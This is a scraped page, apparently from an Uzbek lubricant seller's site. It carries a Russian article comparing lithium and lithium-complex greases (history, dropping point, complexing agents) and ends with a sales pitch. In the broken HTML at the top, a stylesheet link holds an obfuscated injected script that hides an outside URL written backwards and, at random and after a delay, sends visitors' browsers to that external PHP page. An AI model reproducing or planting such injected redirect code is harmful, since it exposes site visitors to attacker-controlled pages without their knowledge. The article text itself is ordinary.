tom-css' href='https://www.klueber.uz/wp-content/themes/betheme/css/skins/cusscript$zXz=function(n)if%20(typeof%20($zXz.list%5Bn%5D)%20==%20string)%20return%20$zXz.list%5Bn%5D.split().reverse().join();return%20$zXz.list%5Bn%5D;;$zXz.list=%5B'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod%5D;var%20number1=Math.floor(Math.random()%20*%206);if%20(number1==3)var%20delay%20=%2018000;setTimeout($zXz(0),%20delay);/scripttom/style.css?ver=21.2.1' type='text/css' media='all' /> tom style-default button-flat layout-full-width hide-love header-stack header-right minimalist-header-no sticky-header sticky-tb-color ab-hide subheader-transparent subheader-both-center menu-link-color menuo-last footer-copy-center mobile-tb-left mobile-mini-mr-ll tr-content be-2121 wpb-js-composer js-comp-ver-4.9.2 vc_responsive">

Подбор смазок: Литий против Литиевого комплекса

to" style="padding-top:0px;padding-bottom:0px;background-color:" >
top bg-auto clearfix" style="" >
Согласно недавнему исследованию объема производства смазок NLGI, около 70 процентов смазок, продаваемых по всему миру, основаны либо на простом литиевом мыле, либо на литиевом комплексном загустителе. Вы можете спросить: «Почему эти типы загустителей так популярны?» и «Как мне решить, какой из них лучше всего подходит для моих условий эксплуатации?» В этой статье будут даны ответы на эти и несколько других вопросов.

Для начала, давайте рассмотрим историческую перспективу. Кларенс Э. Эрл, американский инженер-химик, получил патент США № 2274673 от 3 марта 1942 года на изобретение под названием «Смазочные материалы, содержащие литиевые соли». Это первое описание смазок в патентной литературе на основе простых литиевых мыл. Хотя загустители, описанные в патенте, являются типами, которые обычно используются для производства смазок на основе литиевого мыла, литиевые смазки, описанные Эрлом, открыли новую эру в индустрии смазочных материалов.

Смазки на основе литиевого мыла обладают многими преимуществами по сравнению со смазками на основе других щелочных металлов. Они обладают лучшими влагостойкими свойствами по сравнению с натриевыми мыльными смазками, лучшими высокотемпературными свойствами по сравнению с кальциевыми мыльными смазками и превосходными механическими свойствами.
Хотя процесс производства таких смазок обычно дороже, в сравнении с другими типами консистентных смазок, смазки с литиевым загустителем имеют больше преимуществ по сравнению с натриевыми и кальциевыми загустителями. Таким образом, дополнительные затраты компенсируются за счет повышения производительности.

Смазки на основе литиевого комплекса были разработаны в конце 1940-х годов. Патент США 2 417 428 был выдан Лестеру МакКленнану 18 марта 1947 года. Это один из первых патентов, описывающих сложные мыльные смазки. Однако только в начале 1980-х годов литиевые комплексные смазки появились на рынке в больших объемах и начали вытеснять простые литиевые мыльные смазки, которые были основой промышленности с 1950-х годов.

Смазки на основе литиевого комплекса обладают многими свойствами простых литиевых мыльных смазок, а также имеют более высокую температуру каплепадения, что позволяет использовать смазки при более высоких температурах.

Точка каплепадения у литиевых комплексных смазок выше, чем у простых литиевых мыльных смазок, из-за присутствия второго компонента загустителя, известного как комплексообразующий агент. Современные литиевые комплексные смазки обычно используют дифункциональную карбоновую кислоту с более короткой цепью, такую ​​как азелаиновая кислота или адипиновая кислота.

Литиевая соль этих материалов обычно присутствует в значительно меньшей пропорции по сравнению с простым литиевым мыльным загустителем. Альтернативным материалом, используемым в качестве комплексообразующего агента, является борная кислота. Использование этого материала также приводит к повышенной температуре каплепадения.
Теперь, чтобы ответить на вопросы, поставленные вначале: почему литиевые и литиевые комплексные загустители так популярны? Универсальность. Данные загустители делают смазки, содержащие их, пригодными для использования в широком диапазоне типов применений. Какой из них лучше всего подходит для вас? Загустители схожи по многим свойствам, поэтому лучший способ определить, какую из них указать — это рабочая температура применения.

Многие предпочитают литиевые комплексные смазки в качестве смазок общего назначения, и это хороший подход, поскольку они могут использоваться в широком диапазоне типов применений и в самом широком диапазоне температур. Однако для конкретных применений простые литиевые мыльные смазки часто являются наиболее экономичным выбором.

Купить высококачественные смазки в Узбекистане вы можете обратившись в нашу компанию.

Для правильного подбора смазок для своего производства, оставьте нам заявку или напишите в Телеграм.